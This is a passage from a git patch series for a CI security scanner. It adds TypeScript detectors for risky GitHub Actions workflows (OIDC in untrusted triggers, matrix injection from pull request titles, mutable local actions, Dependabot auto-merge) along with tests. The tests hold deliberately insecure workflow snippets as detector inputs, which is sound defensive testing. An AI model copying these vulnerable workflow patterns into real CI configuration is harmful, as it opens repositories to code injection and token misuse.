null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts b/src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts new file mode 100644 index 0000000..80739fd --- /dev/null +++ b/src/layer2-static/detectors/workflow-dynamic-matrix-injection.ts @@ -0,0 +1,185 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowDynamicMatrixInjectionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const MATRIX_REFERENCE_PATTERN = /\$\{\{\s*matrix\.[^}]+\}\}/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? 
value : undefined; +} + +function isUntrustedDynamicMatrixExpression(value: string): boolean { + const normalized = value.toLowerCase(); + if (!normalized.includes("${{")) { + return false; + } + + const untrustedEventRefs = [ + "github.event.pull_request.", + "github.event.issue.", + "github.event.comment.", + "github.event.review.", + "github.event.discussion.", + "github.event.head_commit.", + ]; + + return untrustedEventRefs.some((ref) => normalized.includes(ref)); +} + +function isStaticFromJsonExpression(value: string): boolean { + const normalized = value.toLowerCase().replace(/\s+/gu, ""); + return ( + normalized.includes("fromjson('") || + normalized.includes('fromjson("') || + normalized.includes("fromjson(`") + ); +} + +function hasMatrixAllowListValidation(condition: string | undefined): boolean { + if (!condition) { + return false; + } + const normalized = condition.toLowerCase(); + return normalized.includes("contains(fromjson(") && normalized.includes("matrix."); +} + +export function detectWorkflowDynamicMatrixInjection( + input: WorkflowDynamicMatrixInjectionInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const root = asRecord(input.parsed); + const jobsRecord = root ? asRecord(root.jobs) : null; + if (!jobsRecord) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const rawJob = asRecord(jobsRecord[job.id]); + if (!rawJob) { + return; + } + const strategyRecord = asRecord(rawJob.strategy); + const matrixExpression = strategyRecord ? 
asString(strategyRecord.matrix) : undefined; + if (!matrixExpression || !isUntrustedDynamicMatrixExpression(matrixExpression)) { + return; + } + if ( + isStaticFromJsonExpression(matrixExpression) && + !matrixExpression.includes("github.event.") + ) { + return; + } + + const hasAllowList = hasMatrixAllowListValidation(job.if); + const severity = hasAllowList ? "MEDIUM" : "HIGH"; + + const matrixEvidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["strategy:", "matrix:", "fromJSON", "github.event"], + fallbackValue: `${job.id} strategy.matrix is built from untrusted event data`, + }); + + findings.push({ + rule_id: "workflow-dynamic-matrix-injection", + finding_id: `WORKFLOW_DYNAMIC_MATRIX_INJECTION-${input.filePath}-${jobIndex}`, + severity, + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.strategy.matrix` }, + description: "Workflow strategy.matrix is derived from untrusted event payload content", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid building strategy.matrix from attacker-controlled event fields", + "Use static allow-list matrices or validate and sanitize dynamic matrix payloads", + "Do not interpolate untrusted matrix values directly into shell commands", + ], + metadata: { + risk_tags: [hasAllowList ? "allow-list-guard" : "no-allow-list-guard"], + origin: "workflow-audit", + }, + evidence: matrixEvidence?.evidence ?? 
null, + suppressed: false, + }); + + job.steps.forEach((step, stepIndex) => { + if (!step.run || !MATRIX_REFERENCE_PATTERN.test(step.run)) { + return; + } + + const runEvidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.run], + fallbackValue: `${job.id} run step interpolates matrix value in shell command`, + }); + + findings.push({ + rule_id: "workflow-dynamic-matrix-injection", + finding_id: `WORKFLOW_DYNAMIC_MATRIX_INJECTION_RUN-${input.filePath}-${jobIndex}-${stepIndex}`, + severity, + category: "CI_TEMPLATE_INJECTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: + "Workflow run step interpolates dynamic matrix values sourced from untrusted event data", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Validate matrix values against explicit allow-lists before shell interpolation", + "Move untrusted values into strictly validated variables before command execution", + ], + metadata: { + risk_tags: [hasAllowList ? "allow-list-guard" : "no-allow-list-guard"], + origin: "workflow-audit", + }, + evidence: runEvidence?.evidence ?? 
null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-local-action-mutation.ts b/src/layer2-static/detectors/workflow-local-action-mutation.ts new file mode 100644 index 0000000..0bd892d --- /dev/null +++ b/src/layer2-static/detectors/workflow-local-action-mutation.ts @@ -0,0 +1,158 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowLocalActionMutationInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + return Object.values(value as Record).some((permission) => { + if (typeof permission !== "string") { + return false; + } + return permission.trim().toLowerCase() === "write"; + }); +} + +function hasIdTokenWrite(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + const idTokenPermission = (value as Record)["id-token"]; + return ( + typeof idTokenPermission === "string" && idTokenPermission.trim().toLowerCase() === "write" + ); +} + +function hasInheritedSecrets(secrets: unknown): boolean { + return typeof secrets === "string" && secrets.trim().toLowerCase() === "inherit"; +} + +function isLocalUsesReference(value: string | undefined): boolean { + if (!value) { + return false; + } + const normalized = value.trim(); + return normalized.startsWith("./") || normalized.startsWith(".\\"); +} + +export function detectWorkflowLocalActionMutation( 
+ input: WorkflowLocalActionMutationInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + const workflowPrivileged = + hasWritePermission(facts.workflowPermissions) || hasIdTokenWrite(facts.workflowPermissions); + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const jobPrivileged = + workflowPrivileged || + hasWritePermission(job.permissions) || + hasIdTokenWrite(job.permissions) || + hasInheritedSecrets(job.secrets); + const severity = jobPrivileged ? "HIGH" : "MEDIUM"; + + if (isLocalUsesReference(job.uses)) { + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [job.uses ?? "", "uses: ./", "pull_request_target"], + fallbackValue: `${job.id} invokes local reusable workflow in untrusted context`, + }); + + findings.push({ + rule_id: "workflow-local-action-mutation", + finding_id: `WORKFLOW_LOCAL_ACTION_MUTATION-JOB-${input.filePath}-${jobIndex}`, + severity, + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.uses` }, + description: + "Untrusted workflow path executes a local reusable workflow reference that can be mutated by pull request content", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-494", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid executing local reusable workflows from untrusted trigger contexts", + "Move privileged operations to immutable pinned actions or trusted workflow_call boundaries", + "Use read-only contexts when local action references are unavoidable", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + } + + job.steps.forEach((step, stepIndex) => { + if (!isLocalUsesReference(step.uses)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.uses ?? "", "uses: ./", "pull_request_target"], + fallbackValue: `${job.id} executes mutable local action from untrusted context`, + }); + + findings.push({ + rule_id: "workflow-local-action-mutation", + finding_id: `WORKFLOW_LOCAL_ACTION_MUTATION-STEP-${input.filePath}-${jobIndex}-${stepIndex}`, + severity, + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: + "Untrusted workflow path executes a local action reference that can be modified by the same pull request", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-494", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid local action execution in untrusted trigger workflows with privileged permissions", + "Pin to immutable third-party actions or split untrusted and privileged jobs", + ], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-oidc-untrusted-context.ts b/src/layer2-static/detectors/workflow-oidc-untrusted-context.ts new file mode 100644 index 0000000..3fc26fa --- /dev/null +++ b/src/layer2-static/detectors/workflow-oidc-untrusted-context.ts @@ -0,0 +1,207 @@ +import type { Finding } from "../../types/finding.js"; +import { buildFindingEvidence } from "../evidence.js"; +import { collectUntrustedReachableJobIds } from "../workflow/analysis.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowOidcUntrustedContextInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const CLOUD_AUTH_ACTIONS = new Set([ + "aws-actions/configure-aws-credentials", + "azure/login", + "google-github-actions/auth", +]); + +const AUDIENCE_KEYS = new Set(["audience", "token_audience", "id_token_audience"]); + +function hasWritePermission(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + return Object.entries(value as Record).some(([key, permission]) => { + if (key.trim().toLowerCase() === "id-token") { + return false; + } + if (typeof permission !== "string") { + return false; + } + return permission.trim().toLowerCase() === "write"; + }); +} + +function hasIdTokenWrite(value: unknown): boolean { + if (typeof value === "string") { + return value.trim().toLowerCase() === "write-all"; + } + if (!value || typeof value !== "object" || Array.isArray(value)) { + return false; + } + + const record = value as Record; + const idTokenPermission = record["id-token"]; + return ( + typeof idTokenPermission === "string" && idTokenPermission.trim().toLowerCase() === "write" + ); +} + +function normalizeUses(value: string | undefined): string | null { + if (!value) { + 
return null; + } + const normalized = value.trim().toLowerCase(); + if (normalized.length === 0) { + return null; + } + const atIndex = normalized.indexOf("@"); + return atIndex === -1 ? normalized : normalized.slice(0, atIndex); +} + +function hasCloudOidcAuthStep(jobSteps: Array<{ uses?: string }>): boolean { + return jobSteps.some((step) => { + const normalizedUses = normalizeUses(step.uses); + return normalizedUses ? CLOUD_AUTH_ACTIONS.has(normalizedUses) : false; + }); +} + +function hasAudienceConstraint(jobSteps: Array<{ with?: Record }>): boolean { + return jobSteps.some((step) => { + const withRecord = step.with; + if (!withRecord) { + return false; + } + + return Object.entries(withRecord).some(([key, value]) => { + if (!AUDIENCE_KEYS.has(key.trim().toLowerCase())) { + return false; + } + return value.trim().length > 0; + }); + }); +} + +function hasActorConstraint(condition: string): boolean { + const normalized = condition.toLowerCase(); + return ( + normalized.includes("github.actor") || + normalized.includes("github.triggering_actor") || + normalized.includes("github.event.pull_request.user.login") + ); +} + +function hasRepositoryOrRefConstraint(condition: string): boolean { + const normalized = condition.toLowerCase(); + return ( + normalized.includes("github.repository") || + normalized.includes("github.event.pull_request.head.repo.full_name") || + normalized.includes("github.event.pull_request.head.repo.fork") || + normalized.includes("github.ref") || + normalized.includes("github.base_ref") || + normalized.includes("github.event.pull_request.base.ref") + ); +} + +function hasStrictTrustChecks(condition: string | undefined): boolean { + if (!condition) { + return false; + } + return hasActorConstraint(condition) && hasRepositoryOrRefConstraint(condition); +} + +export function detectWorkflowOidcUntrustedContext( + input: WorkflowOidcUntrustedContextInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const 
facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const reachableJobIds = collectUntrustedReachableJobIds(facts); + if (reachableJobIds.size === 0) { + return []; + } + + const findings: Finding[] = []; + const workflowHasIdTokenWrite = hasIdTokenWrite(facts.workflowPermissions); + + facts.jobs.forEach((job, jobIndex) => { + if (!reachableJobIds.has(job.id)) { + return; + } + + const jobHasIdTokenWrite = workflowHasIdTokenWrite || hasIdTokenWrite(job.permissions); + if (!jobHasIdTokenWrite) { + return; + } + + const strictTrustChecks = hasStrictTrustChecks(job.if); + const cloudAuthDetected = hasCloudOidcAuthStep(job.steps); + const hasAudience = hasAudienceConstraint(job.steps); + + if (strictTrustChecks && hasAudience) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ + "id-token: write", + "permissions", + "audience", + "github.actor", + "github.repository", + ], + fallbackValue: `${job.id} enables id-token write in untrusted trigger context`, + }); + + findings.push({ + rule_id: "workflow-oidc-untrusted-context", + finding_id: `WORKFLOW_OIDC_UNTRUSTED_CONTEXT-${input.filePath}-${jobIndex}`, + severity: + hasWritePermission(job.permissions) || hasWritePermission(facts.workflowPermissions) + ? "CRITICAL" + : "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.permissions.id-token` }, + description: + "Workflow enables OIDC token minting in an untrusted trigger context without strict trust boundaries", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-284", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Restrict id-token: write to trusted branches or trusted workflow_call boundaries", + "Require explicit actor and repository/ref checks on untrusted triggers", + cloudAuthDetected + ? 
"Configure explicit audience constraints for cloud authentication actions" + : "Add audience constraints and scoped trust conditions before minting OIDC tokens", + ], + metadata: { + risk_tags: [ + strictTrustChecks ? "strict-trust-checks" : "missing-strict-trust-checks", + hasAudience ? "audience-constrained" : "missing-audience-constraint", + cloudAuthDetected ? "cloud-auth-step" : "generic-oidc", + ], + origin: "workflow-audit", + }, + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 44de10a..5f440fd 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -45,6 +45,10 @@ import { detectWorkflowPrTargetCheckoutHead } from "./detectors/workflow-pr-targ import { detectWorkflowArtifactTrustChain } from "./detectors/workflow-artifact-trust-chain.js"; import { detectWorkflowCallBoundary } from "./detectors/workflow-call-boundary.js"; import { detectWorkflowSecretExfiltration } from "./detectors/workflow-secret-exfiltration.js"; +import { detectWorkflowOidcUntrustedContext } from "./detectors/workflow-oidc-untrusted-context.js"; +import { detectWorkflowDynamicMatrixInjection } from "./detectors/workflow-dynamic-matrix-injection.js"; +import { detectDependabotAutoMerge } from "./detectors/dependabot-auto-merge.js"; +import { detectWorkflowLocalActionMutation } from "./detectors/workflow-local-action-mutation.js"; import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; @@ -696,6 +700,50 @@ function buildFileAudits(): Array> { }) : [], }, + { + id: "workflow-oidc-untrusted-context", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? 
detectWorkflowOidcUntrustedContext({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-dynamic-matrix-injection", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowDynamicMatrixInjection({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "dependabot-auto-merge", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectDependabotAutoMerge({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-local-action-mutation", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowLocalActionMutation({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, { id: "hardcoded-container-credentials", run: ({ file, input }) => diff --git a/tests/layer2/dependabot-auto-merge.test.ts b/tests/layer2/dependabot-auto-merge.test.ts new file mode 100644 index 0000000..ecf543e --- /dev/null +++ b/tests/layer2/dependabot-auto-merge.test.ts @@ -0,0 +1,62 @@ +import { describe, expect, it } from "vitest"; +import { detectDependabotAutoMerge } from "../../src/layer2-static/detectors/dependabot-auto-merge"; + +describe("dependabot auto merge detector", () => { + it("flags pull_request_target auto-merge flow gated only by dependabot actor", () => { + const findings = detectDependabotAutoMerge({ + filePath: ".github/workflows/automerge.yml", + textContent: `on: [pull_request_target] +jobs: + automerge: + if: github.actor == 'dependabot[bot]' + steps: + - run: gh pr merge --auto --merge "$PR_URL" +`, + parsed: { + on: ["pull_request_target"], + jobs: { + automerge: { + if: "github.actor == 'dependabot[bot]'", + steps: [ + { + run: 'gh pr merge --auto --merge "$PR_URL"', + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + 
expect(findings[0]?.rule_id).toBe("dependabot-auto-merge"); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag when strict repository boundary checks are present", () => { + const findings = detectDependabotAutoMerge({ + filePath: ".github/workflows/automerge.yml", + textContent: `on: [pull_request_target] +jobs: + automerge: + if: github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name + steps: + - run: gh pr merge --auto --merge "$PR_URL" +`, + parsed: { + on: ["pull_request_target"], + jobs: { + automerge: { + if: "github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name", + steps: [ + { + run: 'gh pr merge --auto --merge "$PR_URL"', + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-dynamic-matrix-injection.test.ts b/tests/layer2/workflow-dynamic-matrix-injection.test.ts new file mode 100644 index 0000000..1caf618 --- /dev/null +++ b/tests/layer2/workflow-dynamic-matrix-injection.test.ts @@ -0,0 +1,70 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowDynamicMatrixInjection } from "../../src/layer2-static/detectors/workflow-dynamic-matrix-injection"; + +describe("workflow dynamic matrix injection detector", () => { + it("flags dynamic matrix from untrusted event data that flows into shell execution", () => { + const findings = detectWorkflowDynamicMatrixInjection({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [pull_request] +jobs: + build: + strategy: + matrix: \${{ fromJSON(github.event.pull_request.title) }} + steps: + - run: echo "\${{ matrix.command }}" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + strategy: { + matrix: "${{ fromJSON(github.event.pull_request.title) }}", + }, + steps: [ + { + run: 'echo "${{ matrix.command }}"', + }, + ], + }, + }, + }, + }); + + expect(findings.length).toBeGreaterThan(0); + 
expect(findings[0]?.rule_id).toBe("workflow-dynamic-matrix-injection"); + expect(findings.some((finding) => finding.location.field?.includes("strategy.matrix"))).toBe( + true, + ); + }); + + it("does not flag static matrix expressions", () => { + const findings = detectWorkflowDynamicMatrixInjection({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [pull_request] +jobs: + build: + strategy: + matrix: \${{ fromJSON('{"include":[{"command":"npm test"}]}') }} + steps: + - run: echo "\${{ matrix.command }}" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + strategy: { + matrix: '${{ fromJSON(\'{"include":[{"command":"npm test"}]}\') }}', + }, + steps: [ + { + run: 'echo "${{ matrix.command }}"', + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-local-action-mutation.test.ts b/tests/layer2/workflow-local-action-mutation.test.ts new file mode 100644 index 0000000..c2bc949 --- /dev/null +++ b/tests/layer2/workflow-local-action-mutation.test.ts @@ -0,0 +1,68 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowLocalActionMutation } from "../../src/layer2-static/detectors/workflow-local-action-mutation"; + +describe("workflow local action mutation detector", () => { + it("flags local action usage in untrusted privileged workflow context", () => { + const findings = detectWorkflowLocalActionMutation({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: ./.github/actions/release +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "./.github/actions/release", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-local-action-mutation"); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag local action 
usage on trusted triggers", () => { + const findings = detectWorkflowLocalActionMutation({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + release: + permissions: + contents: write + steps: + - uses: ./.github/actions/release +`, + parsed: { + on: ["push"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "./.github/actions/release", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-oidc-untrusted-context.test.ts b/tests/layer2/workflow-oidc-untrusted-context.test.ts new file mode 100644 index 0000000..98d973d --- /dev/null +++ b/tests/layer2/workflow-oidc-untrusted-context.test.ts @@ -0,0 +1,88 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowOidcUntrustedContext } from "../../src/layer2-static/detectors/workflow-oidc-untrusted-context"; + +describe("workflow oidc untrusted context detector", () => { + it("flags id-token write in untrusted trigger without strict trust checks or audience constraints", () => { + const findings = detectWorkflowOidcUntrustedContext({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + id-token: write + contents: read + steps: + - uses: aws-actions/configure-aws-credentials@v4 + with: + role-to-assume: arn:aws:iam::123456789012:role/deploy + aws-region: us-east-1 +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + "id-token": "write", + contents: "read", + }, + steps: [ + { + uses: "aws-actions/configure-aws-credentials@v4", + with: { + "role-to-assume": "arn:aws:iam::123456789012:role/deploy", + "aws-region": "us-east-1", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-oidc-untrusted-context"); + expect(findings[0]?.severity).toBe("HIGH"); + }); + + it("does not flag when strict actor/repository 
gating and audience constraints are present", () => { + const findings = detectWorkflowOidcUntrustedContext({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request_target] +jobs: + release: + if: github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name + permissions: + id-token: write + contents: read + steps: + - uses: aws-actions/configure-aws-credentials@v4 + with: + role-to-assume: arn:aws:iam::123456789012:role/deploy + audience: sts.amazonaws.com +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + if: "github.actor == 'dependabot[bot]' && github.repository == github.event.pull_request.head.repo.full_name", + permissions: { + "id-token": "write", + contents: "read", + }, + steps: [ + { + uses: "aws-actions/configure-aws-credentials@v4", + with: { + "role-to-assume": "arn:aws:iam::123456789012:role/deploy", + audience: "sts.amazonaws.com", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-f-engine.test.ts b/tests/layer2/workflow-wave-f-engine.test.ts index 5951a59..df44502 100644 --- a/tests/layer2/workflow-wave-f-engine.test.ts +++ b/tests/layer2/workflow-wave-f-engine.test.ts @@ -198,4 +198,133 @@ jobs: const ruleIds = new Set(findings.map((finding) => finding.rule_id)); expect(ruleIds.has("workflow-secret-exfiltration")).toBe(true); }); + + it("surfaces remaining wave-f findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/oidc.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + id-token: write + contents: read + steps: + - uses: aws-actions/configure-aws-credentials@v4 + with: + role-to-assume: arn:aws:iam::123456789012:role/deploy +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + "id-token": 
"write", + contents: "read", + }, + steps: [ + { + uses: "aws-actions/configure-aws-credentials@v4", + with: { + "role-to-assume": "arn:aws:iam::123456789012:role/deploy", + }, + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/matrix.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + build: + strategy: + matrix: \${{ fromJSON(github.event.pull_request.title) }} + steps: + - run: echo "\${{ matrix.command }}" +`, + parsed: { + on: ["pull_request"], + jobs: { + build: { + strategy: { + matrix: "${{ fromJSON(github.event.pull_request.title) }}", + }, + steps: [ + { + run: 'echo "${{ matrix.command }}"', + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/dependabot-automerge.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + automerge: + if: github.actor == 'dependabot[bot]' + steps: + - run: gh pr merge --auto --merge "$PR_URL" +`, + parsed: { + on: ["pull_request_target"], + jobs: { + automerge: { + if: "github.actor == 'dependabot[bot]'", + steps: [ + { + run: 'gh pr merge --auto --merge "$PR_URL"', + }, + ], + }, + }, + }, + }, + { + filePath: ".github/workflows/local-action.yml", + format: "yaml", + textContent: `on: [pull_request_target] +jobs: + release: + permissions: + contents: write + steps: + - uses: ./.github/actions/release +`, + parsed: { + on: ["pull_request_target"], + jobs: { + release: { + permissions: { + contents: "write", + }, + steps: [ + { + uses: "./.github/actions/release", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-oidc-untrusted-context")).toBe(true); + expect(ruleIds.has("workflow-dynamic-matrix-injection")).toBe(true); + expect(ruleIds.has("dependabot-auto-merge")).toBe(true); + expect(ruleIds.has("workflow-local-action-mutation")).toBe(true); + }); }); diff --git 
a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts index 76488ca..c199682 100644 --- a/tests/meta/workflow-audit-parity-contract.test.ts +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -44,6 +44,10 @@ const expectedCheckedAuditIds = [ "workflow-artifact-trust-chain", "workflow-pr-target-checkout-head", "workflow-secret-exfiltration", + "workflow-oidc-untrusted-context", + "workflow-dynamic-matrix-injection", + "dependabot-auto-merge", + "workflow-local-action-mutation", ] as const; function readChecklist(): string { From e971c03e6b6f9a0dd48ac03f6c9f1409d0b48da7 Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 15:06:16 +0000 Subject: [PATCH 5/6] test(workflow): expand wave-f real-case corpus --- docs/workflow-audit-real-cases.md | 44 +- .../.github/workflows/tests.yml | 509 +++++ .../workflows/runtime_build_and_test.yml | 933 ++++++++ .../.github/workflows/daily.yml | 1984 +++++++++++++++++ .../.github/workflows/db-pro.yaml | 133 ++ .../.github/workflows/frontend-lint.yml | 329 +++ .../workflows/dependabot-auto-merge.yml | 13 + .../.github/workflows/frontend-lint.yml | 329 +++ .../workflow-audits/real-cases/index.json | 42 + 9 files changed, 4315 insertions(+), 1 deletion(-) create mode 100644 test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml create mode 100644 
test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml diff --git a/docs/workflow-audit-real-cases.md b/docs/workflow-audit-real-cases.md index 79d2ee3..ec479ac 100644 --- a/docs/workflow-audit-real-cases.md +++ b/docs/workflow-audit-real-cases.md @@ -37,6 +37,48 @@ Each fixture is commit-pinned to keep source provenance stable. - Source: - Local file: `test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml` +5. `RC-05-workflow-pr-target-checkout-head` + +- Expected rule: `workflow-pr-target-checkout-head` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml` + +6. `RC-06-workflow-artifact-trust-chain` + +- Expected rule: `workflow-artifact-trust-chain` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml` + +7. `RC-07-workflow-call-boundary` + +- Expected rule: `workflow-call-boundary` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml` + +8. `RC-08-workflow-secret-exfiltration` + +- Expected rule: `workflow-secret-exfiltration` +- Source: +- Local file: 